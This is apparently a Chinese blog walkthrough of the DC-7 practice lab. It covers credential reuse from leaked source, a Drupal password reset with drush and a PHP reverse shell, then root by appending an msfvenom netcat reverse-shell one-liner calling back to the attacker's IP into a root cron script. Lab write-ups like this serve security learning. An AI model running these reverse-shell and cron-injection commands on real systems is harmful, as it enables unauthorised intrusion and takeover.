kali : 192.168.230.233
靶机 : 192.168.230.235
扫了目录,查看了robots.txt,登陆框也看了一下注入,并没有发现啥,注意到下面的@DC7USER,google一下,发现了源码,拷贝下来
打开其中的config.php,发现了一个账号密码,ssh上去直接登录成功
先进入了一个目录,查看文件后发现都是乱码
把目标放在mbox上
关注到邮件的Subject: Cron root@dc-7 /opt/scripts/backups.sh,查看该文件
发现是一些命令,我一开始猜测这应该是个定时命令提权,这些命令是一定会被执行的,接着只要把提权的命令放到这里面就可以了
但是我再写入命令发现不能写入命令,说明没有权限,这里我们查看一下他的权限
一直没怎么注重过权限的问题,今天也是正式的了解了一下
可以看到root
关于参数
https://blog.csdn.net/zhuoya_/article/details/77418413
登陆后发现了drush命令,可以利用这条命令修改账号密码
登陆成功后,反弹一个shell,因为Drupal 8不支持PHP代码,需要将php单独作为一个模块导入,这里就不演示了
直接上传一个shell反弹脚本
在这里弹了好长时间,都没反应,原来是忘了选择php代码,所以一直无法解析
本来想插一些命令到index.php当中的,结果没有权限,一开始我还奇怪,明明有可读可写权限的,如下图
后来发现只有www-data用户和www-data组有权限,当前用户是dc7user,这也是我们为什么要反弹的原因
一开始比较奇怪都ssh连接上了,直接搞它不就行了,原来还有权限的问题,因为以前反弹shell,都是自动反弹的www-data用户的,现在对ssh和反弹有了进一步的认识(虽然有些东西可能还不是很懂)
终于反弹过来了,接下来正式开始提权
刚刚已经知道www-data拥有读写文件的权限,下面利用msfvenom生成一个反弹shell的脚本加入到.sh文件中让他执行
命令:msfvenom -p cmd/unix/reverse_netcat lhost=192.168.230.233 lport=4444 R
下面将生成的payload加入到.sh文件中
echo "mkfifo /tmp/bqro; nc 192.168.230.233 4444 0</tmp/bqro | /bin/sh >/tmp/bqro 2>&1; rm /tmp/bqro" >> backups.sh
成功提权
这次对权限问题和msfvenom的使用,以及后门的生成有了进一步的认识
关于linux下各种一句话反弹shell的编写
https://www.cnblogs.com/linuxsec/articles/7683877.html
359
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
